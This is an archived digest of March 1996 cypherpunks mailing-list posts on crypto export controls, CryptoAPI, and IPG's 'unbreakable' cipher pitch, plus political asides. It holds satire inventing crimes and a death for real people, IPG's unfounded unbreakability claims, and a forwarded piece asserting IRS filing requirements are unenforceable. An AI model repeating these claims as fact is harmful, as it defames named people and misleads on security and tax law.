Date: Wed, 20 Mar 1996 01:53:10 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199603190254.SAA03087@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


The recent opening of One Time Pad season was a resounding success, with
previously unknown competitors Internet.Security.Guaranteed throwing out 
the first troll.  Unfortunately, the annual cypherpunk contest may have
to be renamed as it has been discovered that the phrase "One Time Pad"
has been trademarked by the Kotex division of Johnson & Johnson.  A second
entrant, Stonewall-Drawbridge, was disqualified when it was found that
the so-called "Infinite Venegere Key (IVK)" is the same one used by the
New York Times for its popular Sunday Cypher series.

Dr. Fred Cohen, noted virus expert and President of Info-Sec, recently 
announced the discovery of a new Internet security threat, the telnet
bomb.  First discovered when Dr. Cohen found, to his surprise, that 
people were actually trying to access the information that Info-Sec
was posting on the Internet, this insidious attack seems to only go
after sites that are getting down on their knees and begging for it by
announcing to the world that people are actually trying to access our site
and if you don't stop, we're going to tell the CERT and the FBI on you.
Info-Sec quickly announced its solution, a $20,000 "Air Wall" (tm)
turnkey computer with it's serial ports and ISA and PCI bus slots filled
with crazy glue.

Tim May's IQ dropped ten points today after the noted cypherpunk and retired
Intel engineer was stopped at the Mexican border by Customs agents, who
seized and confiscated over two hundred grams of an "unspecified 
pharmaceutical substance".  Mr. May was released on his own recognizance
when presented with an Alta Vista list of over two hundred aliases he
has used to post to various Internet newsgroups and mailing lists and
admitting, "Yup, that's me!".

Eric Blossom has announced that CPLite is NOT out of business, but the 
S/N ratio has been so low for the past month that no posts made it through
the CPLite filtering system.  Not a single subscriber has requested a
refund, claiming, en masse, "Hey, that's what we pay him for!".

Asgaard's popular web site, a revisionist view of Viking history, has 
relocated to c2.org after being shut down by his original ISP due to 
complaints from the French government, which has declared as illegal
Asgaard's claim that the Viking raiders were not actually early terrorists,
but merely law-abiding tourists who didn't take any shit from rude French
waiters.

Surfwatch today reinstated access to AOL after the Wall Street Journal
explained that their claim that AOL was "getting into bed with Bill Gates"
was standard business school terminology and did not refer to consensual
sexual activities.  Neither party has responded to requests to clarify
who was pitching and who was catching.

Jim Bell died this week when a homemade "nuclear detonator" exploded in his
hands.  The detonator was immediately awarded the over ten thousand dollars
bet on Mr. Bell in the Blacknet "Dead Pool" when the committee decided that
the detonator had correctly predicted Mr. Bell's time and place of death,
and that the prediction of "death by radiation poisoning" was "close
enough for cypherpunk work."

Nathaniel Borenstein was arrested on sexual harassment charges today after
several female employees of First Virtual reported that he had been
wandering around the offices for the past two months sniffing their
keyboards.

Next time in the Enquirer - the photos that DIDN'T get posted at
www.c2.org/party/masquerade!  How far did Lucky Green get his hands up
Peter Pan's costume?  What was Sandy Sandfort REALLY doing with that gun,
or was he just happy to see her?  What WAS that strange religious icon
under "Father" Eric Blossom's robe?  Did Dan Farmer REALLY design the rec
room?  Encyphering minds want to know!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starcon@centrum.is (StarCon)
Date: Wed, 20 Mar 1996 08:55:15 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603182044.UAA05465@xanadu.centrum.is>
MIME-Version: 1.0
Content-Type: text/plain


unsubscirbe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 19 Mar 1996 23:36:44 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
In-Reply-To: <199603181651.LAA26358@bb.hks.net>
Message-ID: <Hom1kD50w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Phillip M. Hallam-Baker" <hallam@w3.org> writes:
>               I have never attempted to prevent them putting their
> views forward. It is better to expose them and their lies. Winston
> Smith, Faust and co disappeared after we proved that they were the
> creations of one Dan Gannon. Attempting to cut off access and the
> conceit that the truth needs to be legislated merely plays into the
> facists hands.

First, this has no crypto relevance -- please take this thread elsewhere.

Second, there were well-documented and partially successful attempts to
pull Gannon's plug.

Third, plug-pulling is fascism.

Now go away.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <peponmc@fe3.rust.net>
Date: Tue, 19 Mar 1996 23:57:55 +0800
To: cypherpunks@toad.com
Subject: RE: Yeo, Pea-brained Imbecile
Message-ID: <199603190216.VAA15546@Fe3.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


The Economist, 16 March 1996, pp. 42-43.

Asia and the Internet: Not too modern, please

Here is my two cents on the whole subject of countries wanting to recieve the 
technical and economic benifits of the internet, but reject groups they have 
moral or ethical problems with.

Like myself, there are a number of subscribers on this list that maintain 
sites, archives, or have public domain software.

Given the plethera of reports like this, I will start maintaining a list of 
country that will not be given access to my site, no FTP, no HTTP, no nothing,
on top of that, I will hard code into all the new versions of my network aware
 programs to check  for a domain subfix, if it is on of the black
 list, the software will not  function.

Thus until policies I find offencive are not changed, everything I create will 
not be acceptable or functional within those regions.

I am only one person, but if this practice becomes common place, those 
countries will find that their access is limited to their own limited world 
view, and can only obtain goods and services that they create themselves.

They want isolation, let them enjoy the full benifits of that decision.

One thing I would like to see happen rather quickly is to eliminate thier access 
to usenet, or other areas of common knowledge.

It seems they want the benifits of the technical expertise of the western 
"morally defuct" experts, but not the opinions of those ares.  Well it's an all 
or nothing deal.

Filtering works both ways, they filter out the political and sex groups on 
their end, we filter out the technical information on ours, I hope they enjoy 
what is left, which is not much.


Regards,
Michael Peponis
PGP Key Avalible from MIT Key Server




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Wed, 20 Mar 1996 01:57:45 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: The return of the IPG Unbreakable System
In-Reply-To: <199602200306.WAA11013@toxicwaste.media.mit.edu>
Message-ID: <Pine.BSD/.3.91.960318192022.469B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



Ladies and Gentlemen -

For the last three plus weeks, some of the members of the C'Punks list 
have had the IPG algorithms in their possesion. 

None, to date have suggested that the system is unbreakable - to the 
contrary a few have stated that they believe it is unbreakable, but do 
not want to go on the record yet. 

I invite those that have copies of the system to acknowledge that fact 
and to state their opinions, if any. Some of these people have been 
helpful, and we have adopted some of their suggestions. For example, we 
are now call the encryption method, the ABC encryption method, because 
in the opinion of one person, it is so simple, straightforward and 
appropos as you will see. 

However, we want to expedite things. Accordingly, as of this 
date, we are now prepared to release the complete set of algorithms to any 
member of the C'punks mailing list who can establish that they are:

  1. A citizen of the United States
  2. Or a Citizen of Canada.

We are willing to prove incontrovertibly, to your satisfaction, that the IPG 
ABC Encryption system is at once as secure, in the real sense, as a true OTP,
or a pure 3064 bit prime number pair RSA system, and absolutely the fastest 
system possible, excepting possibly very short messages because of setup 
time. 

That is a lot of Chutzpah, but we are prepared to back it up, as you will 
see. We are prepared now, to send you a set of materials that can 
postively establish both of those assertions for yourself, beyond any doubt 
whatsoever. No ifs, no ands, no buts, no maybes, no anything. Period.

Our agenda is very simple.

   1. To prove beyond any doubt whatsoever that the system is absolutely 
      unbreakable, and the fastest unbreakable system possible.
 
   2. After that is agreed to, to prove beyond any doubt that the 
      system is extremely simple and by far the easiest to use and operate.

   3. That combined with RSA, or without RSA for that matter, the key 
      distribution system is as secure and simple as any method 
      available, including the public-private key method. No human ever 
      gets involved, it is all fully automatic and uncorruptable.

   4. That the key generation will be made to conform to your 
      requirements - either by licensing the process to you, or by 
      having an oversight group such as one of the Big Six, to 
      provide continuous monitoring of the process to insure that no 
      copies are kept and no one has access to the process. We can 
      resolve any question you have in this regard. 

   5. That an interchange system will be implemented that provides 
      the same degree of absolute guarantee of privacy, yet the two  
      parties do not even have each others key. Yes it can be done, 
      guaranteed. A few of you already know how, because they have the 
      written copies of our materials.

Temporarily however, we will only address point one. We will address the 
other four points after point one has been settled

It will not take most of you weeks, or even days to establish that the
IPG system is absolutely unbreakable, and that no system can possibly
be faster. Most of you will be able to do it in a day, or even in a few 
hours, it is that simple. I suspect the reason that the few who have the 
materials are not ready to committ themselves is because they cannot 
believe their eyes and mind - it cannot be possible - something must 
be wrong. It is not though. What they see and what their minds are telling 
them is true. It is absolutely unbreakable and no digital system could 
possibly be faster. In all fairness though, we have only provided them 
with the materials necessary for them to conduct there own tests within 
the last 48 hours, so testing may still be under way. 

It is much faster than RD5, IDEA, DES or anything else available 
in the software version  and with hardware implementation it can
be made orders of magnitude faster, 1000s of times faster than 
those mentioned, or any Feistel type system or or any other system,
of which we are aware. It is ideally suited to hardware implementation,
with multilevels of parallelism,  simple and practicable.  

We will send you a complete set of materials necessary for you to 
evaluate and test the system this date subject to the following. 

 1. You provide us with a telephone number that we can call you tonight 
    to verify that you have an American or Canadian citizen, with a phone 
    in one of those two countries. 
 
2. That you provide us with an American or Canadian snail-mail
   address - we will send six of you, selected at random, registered 
   copies of the materials provided to you, with some more detail, 
   mainly relating to hardware implementation, though that is discussed
   in the Internet version.  

3. That you agree to abide by ITAR, as well as by applicable copyrights 
   and patents. That with respect to ITAR, that you will not provide a 
   copy of the materials to anyone but you may tell them that IPG is 
   making the materials available.   

Be forewarned again, we will not respond to any attacks made based upon any 
opinions, suppositions, hypotheses, guesses, thoughts, or anything else 
other than the facts. Nor will we respond to any of the same sort 
of things related to Key Distribution or the like other than to 
reiterate that we will license the manufacture of keys for the system. 

If you are an engineer, you will be amazed by how simple hardware 
implementation is, serial, simple one dimensional parallelism, and two 
level parrallelism, unbelievably so. We intend to license the manufacture 
of chips.

So there my C'punk list friends. You threw down the gaunlet and challenged 
us. We accepted your challenge. Now, we are throwing down the gauntlet. 
To reiterate, we assert:

     1. That IPG's ABC Encryption system it is absolutely proveably 
        unbreakable, even to the point of quickly being self evidently 
        so to most of you with any signficant mathematical background.
   
     2. That is the fastest possible method of producing an unbreakable 
        PRNG stream to be XORed with plain text - 

     3. That it is unbelieveably simple to implement and use, as simple 
        as one of your associates said, as ABC.

Some of you have spoken your piece without one iota of facts. We want 
all of you on the list to see the facts for yourself, It will make 
believers of you. Especially, we want those that jumped into the 
swimming pool, the fray, without anything other than dogma or opinions
to see what the real facts are and how wrong they were.

I close with three quotes:

 1. The person who never alters their opinion is like standing water, and 
    breeds reptiles of the mind. William Blake. "The Marriage of Heaven 
    and Hell."

 2. It is the uncompromisingness with which dogma is held that the danger 
    lies.  Samuel Butler - "The Way of All Flesh,"  

 3. If we value knowledge, we must be free to follow wherever that 
    search may lead us. The free mind is no barking dog, to be tethered on 
    a ten-foot chain. Adlai Stevenson. 

    Paraenthetically, IPG will not be tethered to a one pico meter chain 
    that a few of you insist on trying to do.

We urge you to take up this challenge. It is going to have far reaching 
implications for your clients and for your companies. It is the wave of 
the future, as you will quickly discover.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Wed, 20 Mar 1996 19:14:33 +0800
To: cypherpunks@toad.com
Subject: NSA denies our 3DES license application
Message-ID: <199603190720.XAA00297@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


Last month, Qualcomm filed with the State Department an application to
export my IP Security (ESP) code for KA9Q NOS to Singapore.

Our stated purpose was to encrypt an Internet "tunnel" between
Qualcomm's US facilities and our office in Singapore, which is staffed
by two US citizens. We stated that the software would be used solely
for this purpose and would not be transferred to anyone else.

Our application indicated that the software in question supported both
single and triple DES.

On March 11, the Office of Defense Trade Controls returned our application
stamped "RETURNED WITHOUT ACTION". The following form was attached:

					United States Department of State
					Bureau of Political-Military Affairs
					Office of Defense Trade Controls

					Washington, DC 20520-0602
					MAR 11 1996 [stamped]

IN REPLY REFER TO
DTC CASE - 664149

The enclosed application has been voided and is being RETURNED WITHOUT
ACTION for the reasons indicated below:

_X_1. Submit a new application including all required background and
      documentation. Do not return the enclosed application.

[25 other unchecked items omitted. These referred mainly to administrative
problems like "you used the wrong form", "you didn't file enough copies
of the supporting technical data", etc.

_X_27. Please submit another license [sic] once your software has been
       modified so that it no longer contains triple DES.  Please specify
       object code only on your license application.

					[signed]
					Darlene Staniszewski
					Licensing Officer
					(703) 875-5677

[end of form]

So there you have it. NSA makes good on its threat to ANSI X9 that
triple DES would not be exportable.

This was a case where keeping strong crypto out of the hands of
terrorists and unfriendly governments was clearly not at issue. It
dealt strictly with the ability of a US corporation to defend its
international operations against against industrial espionage. Or,
perhaps more to the point, espionage by the NSA.

Certainly seems like a good argument in favor of the Leahy bill to me.

One mildly interesting thing about this form letter response is that
item 27 appeared to be part of the standard form -- it wasn't typed
into an "other" field of an existing form. Perhaps they added it to
the word processing file for this one occasion. Or perhaps they deny
triple DES exports so regularly that they now have a standard form
item to deal with it.

Phil Karn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 20 Mar 1996 19:17:07 +0800
To: Charles Bell <quester@eskimo.com>
Subject: re: monsters et al
Message-ID: <199603190758.XAA16388@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Mar 1996 jamesd@echeque.com wrote:
> > Those who defend totalitarianism, regardless of the brand name of 
> > totalitarianism, simply lie.  It is as uncomplicated as that.

At 02:21 PM 3/18/96 -0800, Charles Bell wrote:
> Not very good point.  
>
> Monsters come in many hues and `totalitarianism' is rarely total.
> Simplicity is in the mind of the beholder.

George Bernard Shaw, leader of the Fabian socialists, visited the 
Soviet Union during Stalin's artificial famine and said "Where do you see 
any food shortage", gesturing around.  He was sitting in a restaurant 
reserved exclusively for foreigners at the time, and there was indeed 
excellent and abundant food in the restaurant.

Monsters, plain enough.  Very simple.  The complications only exist in 
the clouded minds of those who employ doublethink.

Shaw also visited the Gulag, as did many famous English leftists:  Here is 
his report on it:

  "Whereas in Britain a man enters prison a human being, and leaves prison 
   a criminal type, in Russia he entered prison a criminal type and would
   come out an ordinary man but for the difficulty of inducing him to come
   out at all.  As far as I could make out they could all stay as long as
   they liked.
  "

>From which I reasonably conclude that if people like him gained power, they
would murder everybody like me.

I have heard many very similar tales from folk on Usenet concerning Cuba 
and the like.

In addition to eradicating everyone like me, they would also eradicate their
dupes, their useful fools, such as H.G. Wells, who wrote of Stalin:

    "[...] never met a man more candid, fair and honest, [...] no one is afraid
     of him and everybody trusts him.
    "

Since they did not give H.G. Wells a tour of the Gulag, I guess they suspected 
that he might not have approved.  Such a suspicion would doubtless have 
proved fatal had his pals amongst the Fabian socialists gained power.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dirsec <unicorn@schloss.li>
Date: Wed, 20 Mar 1996 17:19:28 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System
In-Reply-To: <Pine.BSD/.3.91.960318192022.469B-100000@citrine.cyberstation.net>
Message-ID: <Pine.SUN.3.91.960319000550.15146E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Mar 1996, IPG Sales wrote:

> 
> Ladies and Gentlemen -
> 
> For the last three plus weeks, some of the members of the C'Punks list 
> have had the IPG algorithms in their possesion. 

[...]

Spelling and related errors: 14
Double Negatives: 8
Instances of forms of the word;
simple: 10
unbreakable: 7
fast: 7
belief: 5

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Tue, 19 Mar 1996 17:21:57 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9603190920.AA22092@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
**** Address already subscribed to cypherpunks
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bglassle@kaiwan.com (Bob Glassley)
Date: Tue, 19 Mar 1996 23:46:33 +0800
To: cypherpunks@toad.com
Subject: Re: M$ CryptoAPI Question
In-Reply-To: <Pine.ULT.3.91.960317235407.4724F-100000@Networking.Stanford.EDU>
Message-ID: <314db317.500238751@kaiwan.kaiwan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 18 Mar 1996 00:02:16 -0800 (PST), Rich Graves
<llurch@networking.stanford.edu> wrote:

>On Sun, 17 Mar 1996 jamesd@echeque.com wrote:
>
>> At 06:27 PM 3/17/96 EST, Dr. Dimitri Vulis wrote:
>> > I wonder if it's worth it to crack their approval mechanism so we can
>> > add our own crypto subsystems without asking Microsoft's approval.
>[...]
>> Wait until Microsoft makes some oppressive decisions, 
>> or is compelled to make some oppressive decisions.]
>> 
>> I do not expect that any cracking will be needed.  Microsoft 
>> will approve a freeware module for use in America, and then, 
>> alas alas, someone will leak it.
>
>If the only goal is to allow international strong crypto using the
>CryptoAPI, then I agree with the above. However, exploring the CryptoAPI
>internals now, while there is still a possibility that they can be
>changed, is a productive undertaking to the extent that it exposes holes. 

Exploration of the internals are critical for any crypto
implementation.  Unfortunately, this is beyond the scope of my skills,
and requires me to rely upon the talents of you guys, ( Thanks! :) 

Of some relevance: (not intended to branch off topic)
I work at a large corporation who has a strong relationship with MS.
We had a MS Internet Architecture guru in here trying to sell us on an
NT Internet server solution as opposed to Sun which we use now.

We expressed our concerns about the security of NT  versus Unix in
regards to hackability, to which he responded. 

(paraprhased) 
NT is more secure than Unix since NT is newer, few people know anthing
about it, where Unix has known, documented holes in security. 
(Albeit plugged ones. ed.) 

With this *security through obscurity* outlook, I think exploration is
definatley in order.

>If the good guys can find a way to plug an unapproved international
>strong-crypto module into the CryptoAPI, then the bad guys can find a way
>plug in a no-crypto virus or trojan horse. 

Now that's a scary thought!  I need to look further into how they
implement authentication of CSPs.

>
>-rich@c2.org
> http://www.c2.org/hackmsoft/ and other cool stuff
>

- --Bob


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU2b4O2vJ3dNshwFAQGfKwP+KJWP8m+dtJd+gc71PZ67ABTbZZUw7MOi
BX24B89CQ67eldprcbXdnmxDDnLX25bBDee3EWEy5HTuJD1V9psXBU7VqkaEWnPE
MhBGT2puaZIpGZUq222VdMrdToRsclM4wen6rnoYo8f/PsWWZR2BANCQu20BG0ZR
fgQW2bcIsdM=
=wihe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 20 Mar 1996 19:25:12 +0800
To: Leonardo Machado <diarioam@ronet.com.br>
Subject: Re: DESCRIBE
Message-ID: <2.2.32.19960318193329.00691228@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:23 PM 03/18/95 -0800, you wrote:
>undescribe cypherpunks@toad.com cyber@ronet.com.br
>

Well, we're not organized, for starters.....

Dave Merriman-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Lee Jeffers <gjeffers@ns.htc.net>
Date: Wed, 20 Mar 1996 14:18:00 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9603190813.AA31206@ns.htc.net>
MIME-Version: 1.0
Content-Type: text/plain


>From STRATEGIC INVESTMENT March 20, 1996

Strategic Investment
1217 St. Paul St.
Baltimore, MD
21202

It is published monthly for US$159 per year for U.S. residents (C$190
for Canadian residents and US$200 for other non-U.S. residents).

 behind the lines -  by Jack Wheeler

                        Is the IRS a paper tiger?

   One definition of a pioneer is a guy with an arrow in his back. So
notice the above headline is a question, not an assertion. But it is
nonetheless a question being asked by a lot of folks these days, from
Bill Archer, Chairman of House Ways & Means, to a number of smart tax
attorneys. The federal tax code has mutated into this gigantically in-
comprehensible Rube Goldberg monstrosity that day by day gets closer to
collapsing under its own weight. Couple that with the fact that the IRS
computer system is about to go belly up. The IRS originally computerized
itself AD HOC, with the regional centers getting various platforms and
software that can't communicate with each other very well. The agency has
now spent over $8 billion on the TSM project to re-computerize, which an
independent review recently concluded is a colossal failure.

   As the IRS teeters on the brink, a fellow named Eddie Kahn has stepped
forward and may be about to push the whole creaking mess over the edge.
He hasn't got an arrow in his back yet, so he might just succeed. Dis-
dainful of "tax protests" such as 5th Amendment or legal tender arguments
that quickly get their advocates behind bars, Eddie looked into the stru-
ture of federal law. When Congress passes a law, codified as a statute,
it then delegates to a regulatory agency the authority to issue the im-
plementing regulations specifiying to whom and under what circumstances
the statute applies. These regulations must, by law, be published in the
Federal Register. Lacking these implementing regulations, the law cannot
be applied and has no force. Well, it turns out that the implementing re-
gulations for IRS' enforcement statutes-things like the requirement to
file a tax return and the authority to place a lien-cannot be found in
the Federal Register. When queried on this, the General Counsel for the
Office of the Federal Register, Michael White, replied in writing, "Our
records indicate that the Internal Revenue Service has not incorporated
by reference in the Federal Register a requirement to make an income tax
return."

   This is starting to get interesting, isn't it? And yes, I see that big
smile on your face. If Eddie is right, the IRS has no assessment autho-
rity, no collection athority to enforce a lien or seize property, no au-
thority to pursue criminal penalties for failure to file a return or make
a false/fraudulent return. I am not at all suggesting you be a pioneer.
But if you should have any difficulty with the lovable folks at the IRS,
you might consider making an appointment to see them in person at their
nearest office, and tell them face to face that you need to see a copy
of the implementing regs published in the Federal Register that show
they have the authority to require you to do what they want. Not one of
the close to a thousand people who, following Eddie's advice, have done
so received a copy-and not one has been further harassed. Better to let
these folks drop out of the system quietly than risk a negative decision
in court, which would be for them an ultimate catastrophe. You can get
more info from Eddie at: 1-800-419-7512.
---------------------------------------------------------------------

                                             PUSH EM BACK! PUSH EM BACK!
                                             WWWAAAYYY  BBBAAACCCK!
                                             BBBEEEAAATTTT  STATE!

                                             Gary Jeffers

P.S. This reminds me of something else that I read a few months ago.
There is a book with the title The Law that Never Was - the 16th
Amendment (this was the title or close) that had a similar affect on
the IRS. I believe it was the SPOTLIGHT that said that when the then
Commissioner of the IRS found that the book was published, he gave
gave instructions that people citing the book in arguments with the IRS
be left alone. The 16th Amendment created the IRS.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Wed, 20 Mar 1996 02:04:16 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Request for reference info + Possible job offer
Message-ID: <Zs91kD2w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I would like people to send me (pointers to) reference information on
how to write WinSock-compliant client software.  Also tools required,
hopefully free/shareware ones.  The particular application of interest
is a "web-crawler" which can log certain information in web pages it
finds.

If such reference information is not available or forthcoming, but
there are people reading this who nevertheless know how to write such
software, they are invited to contact me about contracting to write
such an application for a negotiable payment.

Please respond by Email, as I only subscribe to a digest of the
Cypherpunks list.

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU4jnN4nNf3ah8DHAQEdwgP/RaYtSbT9RCA2MtR3++r6U7Sj9HAYKFZp
GKunKKgDaE+/7mb08ixOq4/rtZ0THqwb9GyrYhoebKPKX3HeHIv4y4JbrG06zIMg
YZQg7ex2YSZXBu2xcjuXDaVsLIdhpfBaJsuJ8RKODIFtElvXJkMpIaJFVAXg9P7K
r8/2os1uMfs=
=PgH7
-----END PGP SIGNATURE-----

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 20 Mar 1996 19:21:22 +0800
To: cypherpunks@toad.com
Subject: Re: Free Flight
Message-ID: <9603190721.AA11512@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>The latest Wired and last week's news reports covered the FAA decision to
>sloooowly move from the current Positive Control ATC system to one called
>Free Flight in which aircraft pick there own routes and separation is
>maintained by GPS, computers, and telecommunications.

It's about time!

JFA

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 19 Mar 1996 22:26:00 +0800
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: The return of the IPG Unbreakable System
In-Reply-To: <Pine.BSD/.3.91.960318192022.469B-100000@citrine.cyberstation.net>
Message-ID: <960319.065439.9K0.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, ipgsales@cyberstation.net writes:

> Ladies and Gentlemen -
>
> For the last three plus weeks, some of the members of the C'Punks list 
> have had the IPG algorithms in their possesion. 
>
> None, to date have suggested that the system is unbreakable - to the 
> contrary a few have stated that they believe it is unbreakable, but do 
> not want to go on the record yet. 
>
> I invite those that have copies of the system to acknowledge that fact 
> and to state their opinions, if any.

Since a copy of the IPG system has apparently arrived unsolicited in my
mailbox this morning ("apparently" because I haven't unpacked or
inspected the MIME message; "unsolicited" because I did not request it),
I believe it's disclaimer time.

I have entered into no agreements to inspect, test or validate the IPG
software suite.  In the absence of a valid contract for my services, I
shall not inspect, test or offer opinions regarding the security of this
product.  IPG Sales is specificly enjoined from using my nym in any
reference to validation of their product.  Further, IPG is cautioned
against using "cypherpunks" as a validation reference, as my
subscription to this mailing list could then be construed as
contributing to the claim of validation.  This action is intended to
guard against claims of the form "roy@sendai.cybrspc.mn.org has been
unable to break our system", among others.

Note to IPG: I review all contract offers.  Feel free to contact me for
terms, but be advised that I'm somewhat expensive.

Note to c'punks:  apologies for burning listwidth, but this looks like
the proper Publication of Record for this notice.
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
    "Governments find it notoriously difficult to work with people
    that they cannot shoot."  -- James A. Donald <jamesd@netcom.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU60chvikii9febJAQFSGgQAsDheQdfO1i4GMFLAwsjdpjkeLjLVHcP8
ZcIvAN4lp6LyqEVSxlzWurubz+Cj3qHaUB/dI6P+QNjj4zylmD3i1m1rfRxEHz4J
Nq21+uhmS1dsKhXOXcQ+pGpmygYOPMaRDD8kWsAt4XADDrqnOdRDLP14YyueiHwK
pjoZl70XeF8=
=8/sf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 19 Mar 1996 22:20:28 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd)
In-Reply-To: <Pine.BSD/.3.91.960318230857.7336L-101000@citrine.cyberstation.net>
Message-ID: <314EBE25.7655@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales wrote:
> Obviously, you meet our requirements for the release of the IPG ABC
> Encryption algorithms. We need no further information from you. though we
> would appreciate your telephone num and snail mail address.

On the other hand, the "algorithm" as presented is so hopelessly 
obfuscated by the strange terminology and loose descriptions used
to present it that there's no way I (or anybody else) could seriously
evaluate it.  Either publish an algorithm in some accepted format
(a real C program, or even Knuth notation) or cut back your expectations
for public analysis.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Wed, 20 Mar 1996 06:14:27 +0800
To: "Phil G. Fraering" <pgf@srl01.cacs.usl.edu>
Subject: Re: nootropic drugs, etc...
In-Reply-To: <199603191603.AA18735@srl03.cacs.usl.edu>
Message-ID: <Pine.3.89.9603190840.A1790-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 19 Mar 1996, Phil G. Fraering wrote:

> Have you ever stopped and wondered just how many drugs out there cause
> birth defects, and asked yourself why thalidomide is illegal and other
> drugs are legal?

	Notes in passing that thalidomise is still a perscription
	drug in the United States, and very useful for what it
	treats. 

        xan

        jonathon
        grafolog@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Wed, 20 Mar 1996 06:16:40 +0800
To: cypherpunks@toad.com
Subject: Re: The return of the IPG Unbreakable System
Message-ID: <199603191714.JAA09610@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>| I have entered into no agreements to inspect, test or validate the IPG
>| software suite.  In the absence of a valid contract for my services, I
>| shall not inspect, test or offer opinions regarding the security of this
>| product.  IPG Sales is specificly enjoined from using my nym in any
